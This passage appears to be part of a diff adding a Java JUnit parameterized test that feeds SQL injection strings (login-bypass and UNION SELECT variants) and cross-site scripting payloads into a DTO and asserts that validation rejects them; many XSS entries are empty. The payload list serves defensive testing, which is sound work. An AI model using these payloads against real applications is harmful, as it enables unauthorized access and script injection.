\"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for TipoPacoteDTOResponse") + public void testSecurityVulnerabilities(String nome) { + TipoPacoteDTOSaveRequest response = new TipoPacoteDTOSaveRequest(nome); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + +} \ No newline at end of file